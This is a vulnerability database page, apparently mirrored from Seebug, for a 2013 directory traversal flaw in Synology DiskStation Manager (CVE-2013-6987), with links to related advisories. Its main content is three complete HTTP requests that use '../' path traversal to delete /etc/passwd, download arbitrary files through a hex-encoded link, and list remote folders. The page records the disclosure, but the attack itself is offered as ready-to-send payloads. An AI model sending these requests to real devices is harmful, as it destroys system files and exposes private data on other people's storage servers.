Lucene search
+L

Synology DSM目录遍历漏洞

🗓️ 25 Dec 2013 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 618 Views

Synology DSM directory traversal vulnerability. Exploit examples: delete /etc/passwd, arbitrary file download, remote file list

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
Synology DSM 4.3-3810 - Directory Traversal
24 Dec 201300:00
zdt
cve
CVE
CVE-2013-6987
31 Dec 201315:00
cve
cvelist
Cvelist
CVE-2013-6987
31 Dec 201315:00
cvelist
exploitdb
Exploit DB
Synology DSM 4.3-3810 - Directory Traversal
24 Dec 201300:00
exploitdb
nvd
NVD
CVE-2013-6987
31 Dec 201316:04
nvd
packetstorm
Packet Storm
Synology DSM 4.3-3810 Directory Traversal
23 Dec 201300:00
packetstorm
prion
Prion
Directory traversal
31 Dec 201316:04
prion
ptsecurity
Positive Technologies
PT-2013-6222 · Synology · Synology Diskstation Manager
31 Dec 201300:00
ptsecurity
securityvulns
securityvulns
CVE-2013-6955 Synology DSM remote code execution
27 Mar 201400:00
securityvulns
securityvulns
securityvulns
Synology DiskStation Manager code execution
27 Mar 201400:00
securityvulns
Rows per page

                                                Following some examples ("test" is a valid folder name):
 
- Delete /etc/passwd
===========================================
POST /webapi/FileStation/file_delete.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 103
Cookie: stay_login=0; id=kjuYI0HvD92m6
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
 
path=/test/../../etc/passwd&accurate_progress=true&api=SYNO.FileStation.Delete&method=start&version=1
===========================================
 
- Arbitrary file download:
===========================================
GET /fbdownload/?dlink=2f746573742f2e2e2f2e2e2f6574632f706173737764 HTTP/1.1
Host: 192.168.56.101:5000
Connection: keep-alive
Authorization: Basic XXXXXXXX
===========================================
 
2f746573742f2e2e2f2e2e2f6574632f706173737764 -> /test/../../etc/passwd
 
- Remote file list:
=========================
POST /webapi/FileStation/file_share.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Length: 75
Cookie: stay_login=0; id=f9EThJSyRaqJM; BCSI-CS-36db57a1c38ce2f6=2
 
folder_path=/test/../../tmp&api=SYNO.FileStation.List&method=list&version=1
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Dec 2013 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.14885
618